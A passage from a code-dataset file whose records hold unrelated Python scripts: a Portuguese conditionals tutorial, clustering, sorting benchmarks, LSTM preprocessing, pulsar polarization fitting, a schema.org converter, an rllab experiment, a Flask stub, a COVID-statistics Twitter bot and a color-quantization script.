\"y\"], save = \"optim\")\n\n","sub_path":"GPR_REBOOT/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608017616","text":"# As condicionais é dar a capacidade de decisão ao programa. As condicionais são 'if', 'else' e 'elif'. Essas\r\n# condicionais trabalham em cima de Verdadeiro (True) ou Falso (False). No exemplo abaixo a idade é igual a 17, mas\r\n# a condicional é que: se for maior ou igual a 18, deve-se retornar a mensagem teste. Como 17 não é maior ou igual a 18\r\n# o programa não retorna erro ou mensagem.\r\nidade = 17\r\nif idade >= 18:\r\n print ('teste')\r\n\r\n# Já no caso abaixo a idade é igual a 18, logo retornará a mensagem 'teste'.\r\nidade = 18\r\nif idade >= 18:\r\n print('teste')\r\n\r\n# Também pode-se usar o símbolo de menor para realizar as comparações dentro do programa. Caso a variável tenha que ter\r\n# o valor exatamente igual ao que se procura, deve-se usar '=='. Um igual só é atribuição de valor a variável.\r\nidade = int(input('Digite sua idade: '))\r\nif idade == 18:\r\n# Aqui vemos uma indetação, pois está na mesma linha que a primeira decisão ou dentro do 'if'.\r\n print('A idade é igual a 18!')\r\n# print ('dentro do if')\r\n\r\n# Uma das coisas que podem ser acrescentadas entre um 'if' e um 'else' é um 'elif'. É como se fosse para ter uma nova\r\n# condição antes da decisão final do programa. O 'elif' significa 'senão se'.\r\nelif idade == 17:\r\n print ('A idade é igual a 17!')\r\n\r\n# Já aqui está fora da indentação ou fora do 'if' e por isso ele imprime a linha abaixo de qualquer maneira\r\n#print ('fora do if')\r\n# O 'if' pode trabalhar sozinho na qu17estão acima, porém caso seja declarada uma idade diferente o programa tem que tomar\r\n# uma decisão, então será usado um 'else'. O 'else' deve vir em seguida (na mesma linha) do 'if'\r\nelse:\r\n print ('A idade não é 17 e nem 18!')\r\n\r\n# Uma outra forma de verificar o valor de algo é diferente dentro dos operadores é usando '!=' que significa\r\n# \"não é igual a...\". Com esse operador o if continua procurando algo que seja exatamente igual ao valor atribuído.\r\n# Se digitar no IDLE: idade = 17 e depois digitar idade != 18 o IDLE do python retornará True, por que está realmente\r\n# afirmando que 17 é diferente de 18.\r\nidade = int(input('Digite sua idade: '))\r\nif idade != 18:\r\n print ('A idade não é igual a 18!')\r\n\r\n# No python qualquer valor tem atrelado a ele Verdadeiro ou Falso, por exemplo:\r\ny = 5\r\nif y:\r\n print ('teste')\r\n\r\n# Lembre-se que o python considera qualquer valor vazio ou 0 igual a falso. Abaixo pode ver que o y = 0 o que\r\n# vai acontecer é que a linha de print não será executada por que ela é falsa. Se o valor for diferente de zero\r\n# o python considera verdadeiro. Segue exemplo:\r\ny = 0\r\nif y:\r\n print ('teste')\r\n\r\n# Pode-se terstar se alguma lista ou dicionário tem valor ou não, por exemplo se abre uma lista mas não se coloca\r\n# valores:\r\nlista1 = []\r\nif lista1:\r\n print ('Lista tem valores')\r\n\r\n# OBS: No IDLE pode usar o 'else' porque só pode executar um comando por vez.\r\n# Se colocar algum valor na lista ou no Dic. o comando acima imprimirá a mensagem. 
+{"seq_id":"169291827","text":"from pyclustering.cluster.center_initializer import random_center_initializer as rci\nfrom pyclustering.cluster.kmedians import kmedians\nfrom pyclustering.utils.metric import distance_metric\n\ndef kmediansRun(sample, k, specMetric):\n    initial_medians = rci(sample, k).initialize()\n    kmedians_instance = kmedians(sample, initial_medians, metric = distance_metric(specMetric))\n\t\n    kmedians_instance.process()\n    clusters = kmedians_instance.get_clusters()\n    predicted = kmedians_instance.predict(sample)\n    return (clusters, predicted)","sub_path":"MasterDegree/kmediansRun.py","file_name":"kmediansRun.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
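kmediansRun above hides pyclustering's three-step setup (initialize medians, process, predict) behind one call. A minimal usage sketch; the sample points are made up, and passing type_metric.EUCLIDEAN as specMetric is an assumption about the caller, not something the original repo shows:

# Hypothetical driver for kmediansRun (assumes pyclustering is installed).
from pyclustering.utils.metric import type_metric

sample = [[1.0, 1.0], [1.2, 0.8], [8.0, 8.1], [7.9, 8.3]]
clusters, predicted = kmediansRun(sample, 2, type_metric.EUCLIDEAN)
print(clusters)   # index lists per cluster, e.g. [[0, 1], [2, 3]]
print(predicted)  # a cluster label for every input point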
+{"seq_id":"557354185","text":"\"\"\"Standard sorting\"\"\"\n\nimport timeit\nimport random\n\n\"\"\"\nInternally Python uses Timsort - a hybrid sorting algorithm\ncombining insertion sort and merge sort.\nThe point is that real-world data is often partially\nsorted, and on such data Timsort runs noticeably\nfaster than other sorting algorithms. Time complexity:\nO(n log n) in the worst case and O(n) in the best.\n\n\nlist.sort() - sorts the list in place but returns None\nsorted(list) - sorts the list and returns it\n\"\"\"\n\n\ndef standard_sort(lst_obj):\n    ordered_list = sorted(lst_obj)\n    return ordered_list\n\n\norig_list = [random.randint(-100, 100) for _ in range(10)]\n\n# timings for 10 elements\nprint(\n    timeit.timeit(\n        \"standard_sort(orig_list[:])\",\n        globals=globals(),\n        number=1000))\n\norig_list = [random.randint(-100, 100) for _ in range(100)]\n\n# timings for 100 elements\nprint(\n    timeit.timeit(\n        \"standard_sort(orig_list[:])\",\n        globals=globals(),\n        number=1000))\n\norig_list = [random.randint(-100, 100) for _ in range(1000)]\n\n# timings for 1000 elements\nprint(\n    timeit.timeit(\n        \"standard_sort(orig_list[:])\",\n        globals=globals(),\n        number=1000))\n\n\"\"\"\n0.0007880000000000109\n0.005651299999999998\n0.10248260000000001\n\"\"\"\n","sub_path":"Урок 7. Практическое задание/Урок 7. Коды примеров/Стандартная сортировка 1.py","file_name":"Стандартная сортировка 1.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"587020392","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom sklearn.preprocessing import RobustScaler, StandardScaler\n\n\ndef data_prepare(df, cls_id_selected=12, yr_crit=2019):\n    \"\"\"\n    Read the data and pick variables according to the data columns.\n    Collect the cluster ids into a dict, then pull out the cluster_id we want to predict.\n    Drop the first column (the cluster_id itself) >>> [1:]\n    Split the data into the x variables and the y variable.\n    Standardize the x variables before returning them.\n    \"\"\"\n    # ##########################\n    # Split data into clusters #\n    # ##########################\n    #df = df.rename(columns={'count':'cnt'})\n    #df.groupby('Cluster_id').count().sort_values('Year',ascending=False)\n\n    # check a cluster peak by index\n    cls_ids = df[\"Cluster_id\"].unique()\n\n    cluster = {}\n    for cls_id in cls_ids:\n        cluster[cls_id] = df[df['Cluster_id']==cls_id].iloc[:,1:]\n\n    assert len(cluster.keys()) == len(cls_ids)\n\n    train = cluster[cls_id_selected][cluster[cls_id_selected]['Year'] < yr_crit]\n    test = cluster[cls_id_selected][cluster[cls_id_selected]['Year'] == yr_crit]\n    print(\"INFO: TRAIN/TEST shape BEFORE scaling:\", train.shape, test.shape)\n\n    # #######################################\n    # Fetch the train & test column indices #\n    # #######################################\n    cols = list(df.columns)[1:]\n    x_col_ids = []\n    for idx, b in zip(np.arange(100), np.array(cols) != \"Pickup_count\"):\n        # print(idx, b)\n        if b:\n            x_col_ids.append(idx)\n\n    y_col_id = np.argmax(np.array(cols) == \"Pickup_count\")\n\n    # #############\n    # X & y split #\n    # #############\n    train_x = train.values[:, x_col_ids]\n    train_y = train.values[:, y_col_id]\n\n    test_x = test.values[:, x_col_ids]\n    test_y = test.values[:, y_col_id]\n\n    # ######################\n    # Data Standardization #\n    # ######################\n    scaler = StandardScaler()\n    # scaler = RobustScaler()\n    scaler = scaler.fit(train_x)\n\n    train_x_scaled = scaler.transform(train_x)\n    test_x_scaled = scaler.transform(test_x)\n    print(\"INFO: shape of scaled TRAIN_X and TEST_X:\", train_x_scaled.shape, test_x_scaled.shape)\n\n    print(\"INFO: shape of TRAIN_Y and TEST_Y:\", train_y.shape, test_y.shape)\n\n    assert len(train_y) == len(train_x_scaled) == len(train_x)\n    assert len(test_y) == len(test_x_scaled) == len(test_x)\n\n    return train_x_scaled, train_y, test_x_scaled, test_y\n\n\ndef time_window_strided_sampling(X,y, time_steps=1):\n    \"\"\"\n    Append past observations to the current sample as extra variables.\n    Results differ with the configured number of time steps; time_steps=1 performed best.\n    \"\"\"\n    Xs, ys = [], []\n    for i in range(len(X) - time_steps):\n        v = X[i:(i + time_steps)]\n        Xs.append(v)\n        ys.append(y[i + time_steps])\n    return np.array(Xs), np.array(ys)","sub_path":"machineLearn/LSTM/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
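time_window_strided_sampling above turns a flat feature matrix into overlapping windows of shape (time_steps, n_features), pairing each window with the next target value. A toy shape check (the arrays are made up for illustration):

# Toy shape check for time_window_strided_sampling.
import numpy as np

X = np.arange(20).reshape(10, 2)  # 10 samples, 2 features
y = np.arange(10)
Xs, ys = time_window_strided_sampling(X, y, time_steps=3)
print(Xs.shape, ys.shape)  # (7, 3, 2) (7,) -- window i predicts y[i + 3]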
+{"seq_id":"621193043","text":"import numpy as np\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\n\n\nclass RotatingVectorModel(object):\n\n    '''Fits a RVM (RC69) to PA via least squares.'''\n\n    def __init__(self, phase, pa, paerr):\n        self.phase = phase\n        self.pa = pa\n        self.paerr = paerr\n\n    def model(self, parameters):\n        '''The rotating vector model. Everett and Weisberg 2000.'''\n        alpha, beta, phi0, psi0 = parameters\n        zeta = alpha + beta\n        numerator = (np.sin(alpha) * np.sin(self.phase - phi0))\n        denominator = (np.sin(zeta) * np.cos(alpha) - np.cos(zeta) * np.sin(alpha) * np.cos(self.phase-phi0))\n        for d in range(len(denominator)):\n            if denominator[d] == 0:\n                denominator[d] += 0.0001  # small fudge to avoid division by zero\n        model = psi0 + np.arctan(numerator/denominator)\n        return model\n\n    def cf_model(self, phase, alpha, beta, phi0, psi0):\n        '''The rotating vector model.'''\n        zeta = alpha + beta\n        model = (psi0 + np.arctan((np.sin(alpha) *\n                                   np.sin(phase - phi0)) /\n                                  (np.sin(zeta) * np.cos(alpha) -\n                                   np.cos(zeta) * np.sin(alpha) *\n                                   np.cos(phase-phi0))))\n        return model\n\n    def fit_RVM(self, init_params):\n        '''Fit RVM to PA curve.'''\n        best_fit = self._least_squares(init_params)\n        print('best fit = {} degrees'.format(best_fit*180/np.pi))\n        return best_fit\n\n    def _least_squares(self, init_params):\n        '''Least squares fit of model to data.'''\n        b = ([0, -np.pi/2, -np.inf, -np.inf],\n             [np.pi, np.pi/2, np.inf, np.inf])\n        # b = [(0, np.pi), (-np.pi/2, np.pi/2), (-np.inf, np.inf), (-np.inf, np.inf)]\n        model = lambda x: self._residuals(x)\n        lsq = opt.least_squares(model, init_params, bounds=b)\n        return lsq.x\n\n    def _residuals(self, parameters):\n        '''Difference between the model and the data.'''\n        return (self.model(parameters) - self.pa)/self.paerr  # raw residuals on purpose: opt.least_squares squares and sums them itself, so do not square here\n    \n    def fit_psi0(self, init_params):\n        '''Refit psi0 only, holding alpha, beta and phi0 fixed.'''\n        alpha, beta, phi0, psi0_init = init_params\n        best_fit_psi0 = self.lsq_psi0(init_params)\n        best_fit = [alpha, beta, phi0, best_fit_psi0]\n        return best_fit\n\n    def fit_xy(self, init_params):\n        '''Refit phi0 and psi0 together, holding alpha and beta fixed.'''\n        alpha, beta, phi0_init, psi0_init = init_params\n        best_fit_xy = self.lsq_xy(init_params)\n        best_fit = [alpha, beta, best_fit_xy[0], best_fit_xy[1]]\n        return best_fit\n\n    def lsq_psi0(self, init_params):\n        '''Least-squares fit of psi0 with the other parameters held fixed.'''\n        (alpha, beta, phi0, psi0) = init_params\n        lsq = opt.least_squares(self.psi0_residuals, psi0, args=(alpha, beta, phi0))\n        return lsq.x[0]\n\n    def lsq_xy(self, init_params):\n        '''Least-squares fit of (phi0, psi0) with alpha and beta held fixed.'''\n        (alpha, beta, phi0, psi0) = init_params\n        varying_params = [phi0, psi0]\n        lsq = opt.least_squares(self.xy_residuals, varying_params, args=(alpha, beta))\n        return lsq.x\n\n    def model_single_phase_value(self, parameters, phase_value):\n        '''The rotating vector model.'''\n        alpha, beta, phi0, psi0 = parameters\n        zeta = alpha + beta\n        model = (psi0 + np.arctan((np.sin(alpha) *\n                                   np.sin(phase_value - phi0)) /\n                                  (np.sin(zeta) * np.cos(alpha) -\n                                   np.cos(zeta) * np.sin(alpha) *\n                                   np.cos(phase_value-phi0))))\n        return model\n    \n    def psi0_residuals(self, psi0, alpha, beta, phi0):\n        '''Residuals in psi0, taking the smallest offset over n*pi/2 PA wraps.'''\n        parameters = [alpha, beta, phi0, psi0]\n        mindiff = []\n        for i in range(len(self.pa)):\n            mindiff.append((np.divide(min(np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]))),\n                                          np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi/2)),\n                                          np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi/2)),\n                                          np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi)),\n                                          np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi)),\n                                          np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + 3*np.pi/2)),\n                                          np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - 3*np.pi/2)))[0],\n                                          self.paerr[i])))\n        return mindiff\n\n    def 
xy_residuals(self, xyparams, alpha, beta):\n # TO DOCUMENT\n phi0, psi0 = xyparams\n parameters = [alpha, beta, phi0, psi0]\n mindiff = []\n for i in range(len(self.pa)):\n mindiff.append((np.divide(min(np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]))),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + np.pi)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - np.pi)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) + 3*np.pi/2)),\n np.abs(self.pa[i] - (self.model_single_phase_value(parameters, self.phase[i]) - 3*np.pi/2))),\n self.paerr[i])))\n return mindiff\n \n def model_in_2pi_window(self, model):\n '''Put model into region between +pi and -pi.'''\n for i in range(len(model)):\n if model[i] < -np.pi/2:\n while True:\n model[i] += np.pi\n if model[i] >= -np.pi/2:\n break\n elif model[i] > np.pi/2:\n while True:\n model[i] -= np.pi\n if model[i] <= np.pi/2:\n break\n return model\n \n def compare_data_model(self, fitparams):\n '''Separate data into the two modes and identify jump positions.'''\n # Boolean array to separate data points into one mode or the other.\n model = self.model_in_2pi_window(self.model(fitparams))\n model90shift = self.model_in_2pi_window(model-np.pi/2)\n modesplit = []\n for i in range(len(self.pa)):\n dmdiff = np.abs(self.pa[i] - model[i])\n if np.pi/4 < dmdiff < 3*np.pi/4:\n modesplit.append(False)\n else:\n modesplit.append(True)\n # List of phase bin positions where jumps happen.\n jumplist = [0]\n for m in range(len(modesplit) - 1):\n if modesplit[m] is True and modesplit[m+1] is False:\n jumplist.append(m+1)\n elif modesplit[m] is False and modesplit[m+1] is True:\n jumplist.append(m+1)\n # Need end as well, got to deal with the trimming...\n return model, model90shift, modesplit, jumplist\n","sub_path":"RVM.py","file_name":"RVM.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235715495","text":"import pprint\nimport json\n\nclass SchemaOrgToJsonSchema(object):\n\t\"\"\"docstring for SchemaOrgToJsonSchema\"\"\"\n\tdef __init__(self, args=[], kwargs={}):\n\t\tsuper(SchemaOrgToJsonSchema, self).__init__()\n\t\tself.args = args\n\t\tself.tocamelCase = lambda s: s[:1].lower() + s[1:] if s else ''\n\t\tself.schema_rdfs_json = eval(open(kwargs.get(\"schema_rdfs_json_file\")).read(),\\\n\t\t\t\t\t\t\t\t\t {\"null\": None, \"true\": True, \"false\": False})\n\n\t\tself.json_schema = {}\n\n\tdef get_field(self, schema_dict, superclass):\n\t\tif not schema_dict.get(\"schema:supersededBy\"):\n\t\t\tfield = {\n\t\t\t\t\t\t# \"name\": self.tocamelCase(superclass[\"@id\"].replace(\"schema:\", \"\")),\n\t\t\t\t\t\t\"name\": superclass[\"@id\"].replace(\"schema:\", \"\"),\n\t\t\t\t\t\t# \"label\": superclass.get(\"rdfs:label\", \"\"),\n\t\t\t\t\t\t\"comment\": superclass.get(\"rdfs:comment\", \"\")\t\t\t\t\t\n\t\t\t\t\t}\n\n\t\t\tranges = schema_dict.get(\"schema:rangeIncludes\")\n\t\t\tif ranges:\n\t\t\t\tif type(ranges) == type([]):\n\t\t\t\t\tfield[\"types\"] = [srange[\"@id\"].replace(\"schema:\", \"\") for srange in ranges]\t\n\t\t\t\telse:\n\t\t\t\t\tfield[\"types\"] = [ranges[\"@id\"].replace(\"schema:\", \"\")]\n\t\t\treturn field\n\t\treturn {}\n\n\tdef 
get_fields(self, schema_dict, superclasses):\n\t\tfields = []\n\t\tif type(superclasses) == type([]):\t\t\t\t\t\t\n\t\t\tfor superclass in superclasses:\n\t\t\t\tfield = self.get_field(schema_dict, superclass)\n\t\t\t\tif field:\n\t\t\t\t\tfields.append(field)\n\t\telse:\n\t\t\tfield = self.get_field(schema_dict, superclasses)\n\t\t\tif field:\n\t\t\t\tfields.append(field)\n\t\treturn fields\n\n\tdef add_fields(self, schema_id, sfields, fields):\n\t\tif sfields:\n\t\t\tself.json_schema[schema_id][\"fields\"].extend(fields)\n\t\telse:\n\t\t\tself.json_schema[schema_id][\"fields\"] = fields[:]\n\n\tdef set_schema(self, schema_id):\n\t\tif not self.json_schema.get(schema_id):\n\t\t\tself.json_schema[schema_id] = {}\n\n\tdef add_enum(self, schema_id, enum_val):\n\t\tenum_list = self.json_schema[schema_id].get(\"enum\")\n\t\tif enum_list:\n\t\t\tself.json_schema[schema_id][\"enum\"].append(enum_val)\n\t\telse:\n\t\t\tself.json_schema[schema_id][\"enum\"] = [enum_val]\n\n\tdef generate_from_type(self, schema_dict, stype):\n\t\tif stype == \"rdfs:Class\":\n\t\t\tschema_id = schema_dict[\"@id\"].replace(\"schema:\", \"\")\n\t\t\tself.set_schema(schema_id)\n\t\t\tself.json_schema[schema_id][\"comment\"] = schema_dict[\"rdfs:comment\"]\n\t\t\t# self.json_schema[schema_id][\"label\"] = schema_dict[\"rdfs:label\"]\n\n\t\t\tsuperclasses = schema_dict.get(\"rdfs:subClassOf\")\n\t\t\tif superclasses:\t\t\t\t\n\t\t\t\tfields = self.get_fields(schema_dict, superclasses)\n\t\t\t\tsfields = self.json_schema[schema_id].get(\"fields\")\n\t\t\t\tself.add_fields(schema_id, sfields, fields)\n\n\t\telif stype == \"rdf:Property\":\n\t\t\tfields = self.get_fields(schema_dict, schema_dict)\n\t\t\tdomains = schema_dict.get(\"schema:domainIncludes\")\n\t\t\tif domains:\t\t\t\t\n\t\t\t\tif type(domains) == type([]):\n\t\t\t\t\tfor domain in domains:\n\t\t\t\t\t\tschema_id = domain[\"@id\"].replace(\"schema:\", \"\")\n\t\t\t\t\t\tself.set_schema(schema_id)\n\t\t\t\t\t\tsfields = self.json_schema[schema_id].get(\"fields\")\n\t\t\t\t\t\tself.add_fields(schema_id, sfields, fields)\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tschema_id = domains[\"@id\"].replace(\"schema:\", \"\")\n\t\t\t\t\tself.set_schema(schema_id)\n\t\t\t\t\tsfields = self.json_schema[schema_id].get(\"fields\")\n\t\t\t\t\tself.add_fields(schema_id, sfields, fields)\n\t\t\t\t\n\t\telif stype.startswith(\"schema:\"):\n\t\t\tschema_id = stype.replace(\"schema:\", \"\")\n\t\t\tself.set_schema(schema_id)\n\t\t\tif schema_dict[\"@id\"].startswith(\"schema\"):\n\t\t\t\tself.add_enum(schema_id, schema_dict[\"@id\"].replace(\"schema:\", \"\"))\n\t\telse:\n\t\t\traise Exception(\"Type not found: \" + stype)\n\n\tdef generate_schema_json(self, schema_dict):\n\t\tstypes = schema_dict[\"@type\"]\n\t\tif type(stypes) == type([]):\n\t\t\tfor stype in stypes:\n\t\t\t\tself.generate_from_type(schema_dict, stype)\n\t\telse:\n\t\t\tself.generate_from_type(schema_dict, stypes)\n\n\tdef main(self):\n\t\tfor schema_dict in self.schema_rdfs_json[\"@graph\"]:\n\t\t\tself.generate_schema_json(schema_dict)\n\n\t\tprint(json.dumps(self.json_schema))\n\t\t# for i in self.json_schema:\n\t\t# \tif i == \"FinancialService\":\n\t\t# \t\tprint(i, \" : \")\n\t\t# \t\tprint(pprint.pformat(self.json_schema[i]))\n\t\t# \t\tprop_list = []\n\t\t# \t\tfor j in self.json_schema[i][\"fields\"]:\n\t\t# \t\t\tprop_list.append(j[\"name\"])\n\t\t# \t\tprop_list.sort()\n\t\t# \t\tprint(prop_list)\n\t\t# \t\tprint(len(self.json_schema[i][\"fields\"]))\n\t\t# for i in self.json_schema:\n\t\t# \tfor j in 
self.json_schema[i][\"fields\"]:\n\t\t# \t\tif \"types\" not in j.keys():\n\t\t# \t\t\tprint(j)\n\t\t# print(len(self.json_schema))\n\nif __name__ == \"__main__\":\n\tschema_rdfs_json_file = \"schema.org-docs-schema_org_rdfa.json\"\n\tstjObj = SchemaOrgToJsonSchema(args=[], kwargs={\"schema_rdfs_json_file\" : schema_rdfs_json_file})\n\tstjObj.main()","sub_path":"varundeboss/apis/schema_org/scripts/schemaorg_rdfs_json_to_jsonschema.py","file_name":"schemaorg_rdfs_json_to_jsonschema.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"650613823","text":"from rllab.envs.gym_env import GymEnv\nfrom rllab.envs.box2d.cartpole_env import CartpoleEnv\n\nfrom rllab.algos.vpg import VPG\nfrom rllab.envs.normalized_env import normalize\nfrom rllab.misc.instrument import run_experiment_lite\nfrom rllab.policies.categorical_mlp_policy import CategoricalMLPPolicy\nfrom rllab.baselines.zero_baseline import ZeroBaseline\n# from rllab.optimizers.first_order_optimizer import FirstOrderOptimizer #sgd\nimport lasagne.updates\n\n\ndef run_task(*_):\n # env = normalize(HalfCheetahEnv())\n\n env = normalize(GymEnv(env_name = \"Acrobot-v1\",force_reset=True, record_video=True))\n\n max_path_length = env.horizon\n print(max_path_length)\n baseline = ZeroBaseline(env_spec=env.spec)\n policy = CategoricalMLPPolicy(\n env_spec=env.spec,\n # The neural network policy should have two hidden layers\n hidden_sizes=(64, 64)\n )\n # optimizer = FirstOrderOptimizer(update_method=lasagne.updates.adam, learning_rate=1e-1)\n\n algo = VPG(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=800,\n max_path_length=500,\n n_itr=10000,\n discount=0.99,\n optimizer_args=dict(\n learning_rate=0.01,\n )\n )\n algo.train()\n\n # algo = VPG(\n # env=env,\n # policy=policy,\n # baseline=baseline,\n # optimizer=optimizer,\n # n_itr = 100,\n # batch_size = 100,\n # max_path_length = 100,\n # discount = 0.9,\n # )\n # algo.train()\n\nrun_experiment_lite(\n run_task,\n # Number of parallel workers for sampling\n log_dir='./log/vpg_acrobot_REINFORCE',\n n_parallel=1,\n # Only keep the snapshot parameters for the last iteration\n snapshot_mode=\"last\",\n # Specifies the seed for the experiment. If this is not provided, a random seed\n # will be used\n seed=1,\n # plot=True,\n)\n\n\n# https://github.com/rll/rllab/issues/146\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"rllab/vpg_gym_acrobot_REINFORCE.py","file_name":"vpg_gym_acrobot_REINFORCE.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55102366","text":"from os import environ\n\nfrom flask import Flask\n\nif environ['APP_SETTINGS'] is None:\n print(\"$APP_SETTINGS is not defined. 
Ensure it is set to config.ProductionConfig, config.StagingConfig, \"\n \"config.DevelopmentConfig, or config.TestingConfig\")\n\napp = Flask(__name__)\napp.config.from_object(environ['APP_SETTINGS'])\n\nfrom tixte_foss import routes # nopep8\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=environ['PORT'])\n","sub_path":"tixte_foss/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39058453","text":"import os\nimport tweepy\nimport requests\nimport datetime \nimport os\nfrom pytz import timezone\nfrom bs4 import BeautifulSoup\nfrom threading import Timer\nfrom flask import Flask\n\napp = Flask(__name__)\n\n# keys de validação\nCONSUMER_KEY = os.environ.get('CONSUMER_KEY')\nCONSUMER_SECRET = os.environ.get('CONSUMER_SECRET')\nACCESS_KEY = os.environ.get('ACCESS_KEY')\nACCESS_SECRET = os.environ.get('ACCESS_SECRET')\n\n# Authenticate to Twitter\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\n\n# Create API object\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\n@app.route(\"/\")\n# tweet stats\ndef tweet1():\n #getting date\n now = datetime.datetime.now()\n fuso_horario = timezone('America/Sao_Paulo')\n nowtime = now.astimezone(fuso_horario)\n\n # getting data from brazil\n url = \"https://www.worldometers.info/coronavirus/country/brazil/\"\n r = requests.get(url)\n s = BeautifulSoup(r.text,\"html.parser\")\n data = s.find_all(\"div\",class_ = \"maincounter-number\")\n\n # getting data from world\n url2 = \"https://www.worldometers.info/coronavirus/\"\n r2 = requests.get(url2)\n s2 = BeautifulSoup(r2.text,\"html.parser\")\n data2 = s2.find_all(\"div\",class_ = \"maincounter-number\")\n\n api.update_status(\"--\" + nowtime.strftime(\"%Y-%m-%d %H:%M:%S\") + \"--\" + \"\\n\\nTotal Casos: 🇧🇷 \"+ data[0].text.strip() + \" // 🌎 \" + data2[0].text.strip() + \"\\nTotal Mortes: 🇧🇷 \" + data[1].text.strip() + \" // 🌎 \" + data2[1].text.strip() + \"\\nTotal Recuperados: 🇧🇷 \" + data[2].text.strip()+ \" // 🌎 \" + data2[2].text.strip())\n\n print(\"tweetado1\" + nowtime.strftime(\"%Y-%m-%d %H:%M\"))\n\n Timer(300.0, tweet2).start()\n\ndef tweet2():\n #getting date\n now = datetime.datetime.now()\n fuso_horario = timezone('America/Sao_Paulo')\n nowtime = now.astimezone(fuso_horario)\n\n #getting data\n url = \"https://www.worldometers.info/coronavirus/country/brazil/\"\n r = requests.get(url)\n s = BeautifulSoup(r.text,\"html.parser\")\n data_name = s.find_all(\"div\",class_ = \"number-table-main\")\n data_name2 = s.find_all(\"span\",class_ = \"number-table\")\n\n api.update_status(\"--\" + nowtime.strftime(\"%Y-%m-%d %H:%M:%S\") + \"--\" + \"\\n\\nCasos ativos 🇧🇷\\nAtualmente infectados: \" + data_name[0].text.strip() + \"\\nEm condições suaves: \" + data_name2[0].text.strip() + \" (\" + data_name2[0].next_sibling.next_sibling.text.strip() + \"%)\\nSério ou Crítico: \" + data_name2[1].text.strip() + \" (\" + data_name2[1].next_sibling.next_sibling.text.strip() + \"%)\\n\\nCasos fechados 🇧🇷\\nCasos que tiveram um resultado: \" + data_name[1].text.strip() + \"\\nRecuperados: \" + data_name2[2].text.strip() + \" (\" + data_name2[2].next_sibling.next_sibling.text.strip() + \"%)\\nMortos: \" + data_name2[3].text.strip() + \" (\" + data_name2[3].next_sibling.next_sibling.text.strip() + \"%)\")\n\n print(\"tweetado2\" + nowtime.strftime(\"%Y-%m-%d %H:%M\"))\n\n 
Timer(10800.0, tweet1).start()\n\ndef tweet():\n tweet1()\n\nTimer(10800.0, tweet).start()\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5002))\n app.run(host='0.0.0.0', port=port)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"382606792","text":"#-------------------------------------------------\r\n# Copyright (c) 2019, Titus Ebbecke. All rights reserved.\r\n#-------------------------------------------------\r\n\r\nimport numpy as np\r\nfrom numpy import linalg as LA\r\nimport cv2\r\nimport sys\r\nimport math\r\nimport socket\r\nimport time\r\nimport datetime\r\nimport pathlib\r\nimport config as cfg\r\nimport configcheck as check\r\nimport colors\r\nfrom copy import deepcopy\r\n\r\n#-------------------------------------------------\r\n# Initialize image loading/generation and check config\r\n\r\ncheck.imgLoad()\r\ncheck.securityCheck()\r\n\r\n#-------------------------------------------------\r\n# Image preparation and color quantization\r\n\r\nimg = cv2.imread(check.img)\r\n\r\nheight, width, depth = img.shape\r\nimg = cv2.resize(img,(int(width*cfg.imgScale), int(height*cfg.imgScale))) # Scales image, when defined in config.py\r\n\r\n# Apply fine tuning, when specified in config.py\r\nif cfg.blur > 0:\r\n img = cv2.GaussianBlur(img,(cfg.blur,cfg.blur),0)\r\nif cfg.denoise > 0:\r\n img = cv2.fastNlMeansDenoisingColored(img,None,cfg.denoise,cfg.denoise,7,21)\r\nif cfg.threshColor >= 0:\r\n img = cv2.threshold(img,cfg.threshColor,255,cv2.THRESH_BINARY)[1]\r\n\r\nY = img.reshape((-1, 3))\r\nY = np.float32(Y)\r\n\r\n# K-means Algorithm to reduce color amount to K\r\nK = 